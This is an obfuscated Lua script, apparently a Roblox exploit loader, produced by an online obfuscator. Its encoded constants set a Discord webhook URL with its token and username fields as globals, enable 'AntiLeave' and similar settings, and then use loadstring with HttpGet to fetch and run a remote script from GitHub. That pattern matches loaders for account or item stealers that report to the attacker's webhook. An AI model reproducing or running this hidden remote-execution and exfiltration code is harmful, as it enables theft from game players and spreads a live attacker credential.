--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v95=v5(v80,v19);v19=nil;return v95;else return v80;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v81=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((5 -(1273 -(226 + 1044)))^(((v33-(878 -(282 + 595))) -(v32-(1638 -(1523 + 114)))) + (1 -(0 -0)))) ;return v81-(v81%((118 -(32 + 85)) + 0)) ;else local v82=(4 -2)^(v32-(620 -(555 + 64))) ;return (((v31%(v82 + v82))>=v82) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v40 * (30800116 -14022900)) + (v39 * (65886 -(87 + 263))) + (v38 * ((320 + 116) -(67 + (277 -164)))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,(3 -2) + 0 ,79 -59 ) * (2^(984 -(802 + 150)))) + v41 ;local v45=v20(v42,56 -35 ,55 -24 );local v46=((v20(v42,32)==(1 + 0 + 0)) and  -(998 -(915 + 82))) or (2 -1) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (1187 -(1069 + 118)) ;else local v87=0 -0 ;while true do if (v87==0) then v45=(1 -0) -(438 -(145 + 293)) ;v43=0 + (430 -(44 + 386)) ;break;end end end elseif (v45==(3636 -1589)) then return ((v44==((1486 -(998 + 488)) + 0)) and (v46 * ((792 -(368 + 423))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1041 -(10 + 8)) ) * (v43 + (v44/((7 -(2 + 3))^(494 -(341 + 75 + 26))))) ;end local function v25(v47)local v48=772 -(201 + 571) ;local v49;local v50;while true do if (v48==(862 -(814 + 45))) then return v6(v50);end if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=1139 -(116 + 1022) ;end if (v48==(8 -6)) then v50={};for v88=1 + 0 , #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=4 -1 ;end if (v48==(3 -(9 -7))) then v49=v3(v16,v18,(v18 + v47) -(1424 -(630 + 793)) );v18=v18 + v47 ;v48=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(1 -0)) then local v86=241 -(187 + 54) ;while true do if (v86==(781 -(162 + 618))) then v51=2 + 0 ;break;end if ((0 + 0)~=v86) then else v54=nil;v55=nil;v86=1 + 0 ;end end end if (v51==(0 -0)) then v52=0 -0 ;v53=nil;v51=1552 -(1126 + 425) ;end if (v51==(408 -(118 + 287))) then v58=nil;while true do local v90=0 -0 ;while true do if ((1121 -(118 + 1003))~=v90) then else if (2==v52) then local v96=0 -0 ;while true do local v98=0;while true do if (v98~=0) then else if (v96==(377 -(142 + 235))) then local v149=0;while true do if (v149==(0 -0)) then for v159=1 + 0 ,v23() do local v160=0;local v161;local v162;local v163;while true do if (v160~=(1636 -(1373 + 263))) then else local v170=977 -(553 + 424) ;while true do if (v170==(1001 -(451 + 549))) then v160=1 + 0 ;break;end if (v170==0) then v161=0 -0 ;v162=nil;v170=1 + 0 ;end end end if (v160~=(1 -0)) then else v163=nil;while true do if (v161~=(0 + 0)) then else local v172=0;while true do if (v172==1) then v161=2 -1 ;break;end if (v172==(1384 -(746 + 638))) then v162=0;v163=nil;v172=1;end end end if (1==v161) then while true do if (v162~=(0 + 0)) then else v163=v21();if (v20(v163,2 -1 ,1 -0 )~=(341 -(218 + 123))) then else local v174=1581 -(1535 + 46) ;local v175;local v176;local v177;local v178;local v179;while true do if (v174==(2 + 0)) then v179=nil;while true do if (v175==(1 + 1)) then while true do if (v176==(1 + 1)) then local v181=0;local v182;while true do if (v181==(560 -(306 + 254))) then v182=0 + 0 ;while true do if ((0 -0)==v182) then local v190=1467 -(899 + 568) ;local v191;while true do if (v190==(0 + 0)) then v191=753 -(239 + 514) ;while true do if ((0 -0)~=v191) then else if (v20(v178,1,604 -(268 + 335) )==(1330 -(797 + 532))) then v179[2 + 0 ]=v58[v179[292 -(60 + 230) ]];end if (v20(v178,574 -(426 + 146) ,4 -2 )~=(1 + 0)) then else v179[3]=v58[v179[1459 -(282 + 1174) ]];end v191=812 -(569 + 242) ;end if (v191~=1) then else v182=1;break;end end break;end end end if ((2 -1)~=v182) then else v176=1 + 2 ;break;end end break;end end end if (v176==0) then local v183=1024 -(706 + 318) ;local v184;while true do if ((1251 -(721 + 530))~=v183) then else v184=1271 -(945 + 326) ;while true do if (v184==(2 -1)) then v176=1 + 0 ;break;end if (v184==(700 -(271 + 429))) then v177=v20(v163,2,3);v178=v20(v163,4,6 + 0 );v184=1501 -(1408 + 92) ;end end break;end end end if (v176==(1089 -(461 + 625))) then if (v20(v178,734 -(476 + 255) ,1291 -(993 + 295) )==1) then v179[1 + 3 ]=v58[v179[1175 -(418 + 753) ]];end v53[v159]=v179;break;end if (v176==(1 -0)) then local v186=0;local v187;while true do if (v186~=0) then else v187=0;while true do if ((1 + 0)==v187) then v176=1 + 1 ;break;end if (v187~=(0 + 0)) then else local v192=0 -0 ;while true do if (v192==(337 -(144 + 192))) then v187=1;break;end if (v192~=(0 + 0)) then else local v193=0;while true do if ((0 + 0)==v193) then v179={v22(),v22(),nil,nil};if (v177==(1769 -(1749 + 20))) then local v198=0 -0 ;local v199;while true do if (v198==(0 + 0)) then v199=0;while true do if ((0 + 0)==v199) then v179[1325 -(1249 + 73) ]=v22();v179[2 + 2 ]=v22();break;end end break;end end elseif (v177==(1146 -(466 + 679))) then v179[1978 -(1913 + 62) ]=v23();elseif (v177==2) then v179[3]=v23() -((2 + 0)^(42 -26)) ;elseif (v177==(6 -3)) then local v204=0;while true do if (v204==(1933 -(565 + 1368))) then v179[11 -8 ]=v23() -((5 -3)^(1916 -(106 + 1794))) ;v179[1665 -(1477 + 184) ]=v22();break;end end end v193=1 + 0 ;end if (1==v193) then v192=1 -0 ;break;end end end end end end break;end end end end break;end if (v175~=1) then else local v180=0 + 0 ;while true do if ((0 + 0)==v180) then v178=nil;v179=nil;v180=2 -1 ;end if (v180==(2 -1)) then v175=116 -(4 + 110) ;break;end end end if (v175~=(0 -0)) then else v176=0;v177=nil;v175=1;end end break;end if ((584 -(57 + 527))~=v174) then else v175=304 -(244 + 60) ;v176=nil;v174=1428 -(41 + 1386) ;end if (v174~=(104 -(17 + 86))) then else v177=nil;v178=nil;v174=2 + 0 ;end end end break;end end break;end end break;end end end for v164=1,v23() do v54[v164-(1 + 0) ]=v28();end v149=1126 -(936 + 189) ;end if (v149~=(1 + 0)) then else v96=1 -0 ;break;end end end if (v96==1) then return v56;end break;end end end end if (v52~=0) then else v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1 -0 ;end v90=268 -(176 + 91) ;end if (v90~=(3 -2)) then else if (v52==(1 -0)) then v57=v23();v58={};for v99=1 + 0 ,v57 do local v100=0 + 0 ;local v101;local v102;local v103;local v104;while true do if (v100~=(1 -0)) then else v103=nil;v104=nil;v100=67 -(30 + 35) ;end if (v100==(0 + 0)) then v101=0 -0 ;v102=nil;v100=3 -2 ;end if ((2 + 0)==v100) then while true do if (v101==0) then local v157=1018 -(697 + 321) ;local v158;while true do if (v157==(1257 -(1043 + 214))) then v158=0;while true do if ((3 -2)==v158) then v101=1;break;end if (v158~=(1212 -(323 + 889))) then else local v171=0 -0 ;while true do if (v171==(1 + 0)) then v158=581 -(361 + 219) ;break;end if (v171==0) then v102=320 -(53 + 267) ;v103=nil;v171=1 + 0 ;end end end end break;end end end if (v101==(1228 -(322 + 905))) then v104=nil;while true do if (v102~=(612 -(602 + 9))) then else if (v103==(1190 -(449 + 740))) then v104=v21()~=(413 -(15 + 398)) ;elseif (v103==(984 -(18 + 964))) then v104=v24();elseif (v103==(11 -8)) then v104=v25();end v58[v99]=v104;break;end if (v102==(0 + 0)) then local v167=0;local v168;local v169;while true do if ((0 + 0)~=v167) then else v168=1898 -(260 + 1638) ;v169=nil;v167=851 -(20 + 830) ;end if (v167==(1 + 0)) then while true do if (v168~=(440 -(382 + 58))) then else v169=0 -0 ;while true do if ((0 + 0)==v169) then local v173=0 -0 ;while true do if (v173==1) then v169=127 -(116 + 10) ;break;end if (v173==(1205 -(902 + 303))) then v103=v21();v104=nil;v173=1;end end end if (v169==1) then v102=1 -0 ;break;end end break;end end break;end end end end break;end end break;end end end v56[1 + 2 ]=v21();v52=740 -(542 + 196) ;end break;end end end break;end if (v51==2) then v56=nil;v57=nil;v51=6 -3 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v83=0,v73 do if (v83>=v67) then v71[v83-v67 ]=v72[v83 + 1 ];else v75[v83]=v72[v83 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=9) then if (v78<=4) then if (v78<=1) then if (v78>0) then local v105=v77[2];local v106,v107=v68(v75[v105](v13(v75,v105 + 1 ,v77[3])));v70=(v107 + v105) -1 ;local v108=0;for v131=v105,v70 do v108=v108 + 1 ;v75[v131]=v106[v108];end else v61[v77[3]]=v75[v77[2]];end elseif (v78<=2) then v75[v77[2]]=v61[v77[3]];elseif (v78>3) then v75[v77[2]]();else do return;end end elseif (v78<=6) then if (v78==5) then local v113=v77[2];v75[v113]=v75[v113](v13(v75,v113 + 1 ,v70));else v75[v77[2]]=v77[3];end elseif (v78<=7) then v75[v77[2]][v77[3]]=v77[4];elseif (v78>8) then v75[v77[2]][v77[3]]=v77[4];else v75[v77[2]]=v77[3];end elseif (v78<=14) then if (v78<=11) then if (v78==10) then local v119=v77[2];local v120,v121=v68(v75[v119](v13(v75,v119 + 1 ,v77[3])));v70=(v121 + v119) -1 ;local v122=0;for v134=v119,v70 do v122=v122 + 1 ;v75[v134]=v120[v122];end else v75[v77[2]]=v61[v77[3]];end elseif (v78<=12) then local v125=v77[2];local v126=v75[v77[3]];v75[v125 + 1 ]=v126;v75[v125]=v126[v77[4]];elseif (v78>13) then v61[v77[3]]=v75[v77[2]];else v75[v77[2]]=v77[3]~=0 ;end elseif (v78<=16) then if (v78>15) then do return;end else v75[v77[2]]=v77[3]~=0 ;end elseif (v78<=17) then v75[v77[2]]();elseif (v78==18) then local v144=0;local v145;while true do if (v144==0) then v145=v77[2];v75[v145]=v75[v145](v13(v75,v145 + 1 ,v70));break;end end else local v146=0;local v147;local v148;while true do if (v146==1) then v75[v147 + 1 ]=v148;v75[v147]=v148[v77[4]];break;end if (0==v146) then v147=v77[2];v148=v75[v77[3]];v146=1;end end end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503073O006264724O3003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333633363537313237342O3739302O33372F5451566130466A53506A693534646E7773713067664E4167746441713444346C4341486A52392O454756544763696D35554B582D354C4E2O6B474A537769557766466D3503093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012083O00023O00120E3O00013O0012083O00043O00120E3O00033O0012083O00023O00120E3O00053O00120B3O00063O0030073O0007000800120B3O00063O0030073O0009000800120B3O00063O0030073O000A000800120B3O000B3O00120B0001000C3O00200C00010001000D0012080003000E4O000D000400014O000A000100044O00125O00022O00113O000100012O00033O00017O00",v9(),...);
